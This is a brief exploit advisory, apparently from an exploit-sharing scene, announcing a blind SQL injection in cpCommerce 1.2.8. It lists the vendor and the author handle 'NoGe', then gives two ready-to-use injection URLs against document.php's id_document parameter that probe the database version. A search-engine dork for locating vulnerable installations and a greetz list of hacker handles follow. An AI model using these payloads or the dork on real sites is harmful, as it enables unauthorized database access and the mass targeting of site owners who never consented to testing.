
  [o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

       Software : cpCommerce version 1.2.8
       Vendor   : http://cpcommerce.cpradio.org/
       Download : http://cpcommerce.cpradio.org/downloads.php
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


  [o] Vulnerable file


  [o] Exploit

       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5

  [o] Dork

       "Powered by cpcommerce"


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org ]
       OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
       Special for Vrs-hCk [ thx cuy.. :p ]
